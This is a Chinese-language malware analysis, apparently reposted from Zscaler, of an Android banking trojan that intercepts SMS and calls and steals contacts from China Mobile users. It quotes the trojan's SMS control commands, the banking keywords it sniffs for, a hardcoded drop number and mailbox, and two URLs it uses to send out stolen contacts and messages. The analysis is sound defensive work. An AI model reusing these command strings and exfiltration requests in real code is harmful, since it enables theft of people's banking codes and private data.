揭秘:針對中國移動用戶的強大網銀木馬剖析
我們最近遇到一個安卓平臺的網銀木馬,該木馬主要瞄向中國的移動用戶,檢出率很低。該安卓木馬能夠攔截短信并尋找特定的關鍵字,盜取用戶網銀信息。此外,它還會從用戶的移動設備中盜取所有的聯系人信息,并將其發送到遠程服務器。
木馬相關信息
名字:888.apk
MD5:ff081c1400a948f2bcc4952fed2c818b。
VT: 7/56 (分析該木馬時)
樣本: 點我下載
木馬功能:
1、攔截和捕獲所有接收和發出的短信 2、攔截來電和結束通話的功能 3、通過短信接收C&C服務器指令 4、將盜取的數據通過短信、電子郵件、web請求發送到C&C服務器
代碼級功能分析
下面就讓我們一起分析下該木馬的特征和功能實現:
0×01 捕獲郵箱和手機號
在上面的截圖中,可以看到,該木馬將捕獲的出站短信通過電子郵件發送到硬編碼的163. Com郵箱地址。它將盜取的數據以“發給xxx的短信”為主題發送出去。
在這里,可以看到它將捕獲到的入站短信以同樣的參數用郵件發送到指定郵箱。此外,它還將同樣的信息通過短信發送到一個硬編碼的中國手機號碼“15996581524”。
0×02 電話攔截
上圖顯示了該木馬具有攔截來電的功能,并能夠將來電號碼以主題為“撥打進來的一次來電!”的郵件發送出去,而且它還有掛斷電話的功能。
0×03 遠程控制
該木馬還能夠通過短信接收C&C服務器發送的指令,該指令由木馬作者遠程發送。
在上面的截圖中可以看到,攻擊者可以通過短信發送指令“intercept#”來開始數據的捕獲行為,還能夠通過短信發送指令“interceptstop#”來停止捕獲行為。
在上面的截圖中我們可以看到,與網銀交易有關的地方都做了字符串檢測處理,它可以檢測如“支付”、”校驗”、”銀行”、“余額”、“驗證”的字符串,這很明顯地表明木馬的作者意圖嗅探與網銀相關的信息。
惡意軟件將短信接收器和撥出電話服務的優先級設置為高優先級,這將確保當這些事件發生時,該木馬比其他應用擁有更高的處理優先權。
0×04 請求發送
從上圖中我們也能看到一些代碼,這些代碼能夠確保該木馬將盜取的聯系人信息和短信數據通過Web請求的方式發送出去。
然而,在當前版本的木馬中,這個功能似乎并不起作用……我們猜測可能是木馬的作者仍舊在測試這個功能。
"http://192.168.1.102/input/input_data_get_contact.asp?user=XXX&pwd=XXXX&addr="
"http://192.168.1.102/input/input_data_get_sms.asp?user=XXX&pwd=XXX&addr=XXX&id=XXX"
木馬竊取信息截圖
下面的截圖只是一個示例,顯示木馬的作者通過該惡意APK從感染用戶那里捕獲隱私信息。
1、發送郵件
2、攔截呼入電話
3、竊取聯系人信息
4、受感染的中國移動用戶
經過上面的一系列描述,我們已經可以看到這款移動平臺的網銀盜竊木馬的威力。鑒于木馬往往升級頻繁,逃避查殺的能力也會與日俱增。我們相信未來,木馬對抗將面臨更大的挑戰。
[參考來源 research.zscaler ,轉載請注明來自FreeBuf黑客與極客(FreeBuf.COM)]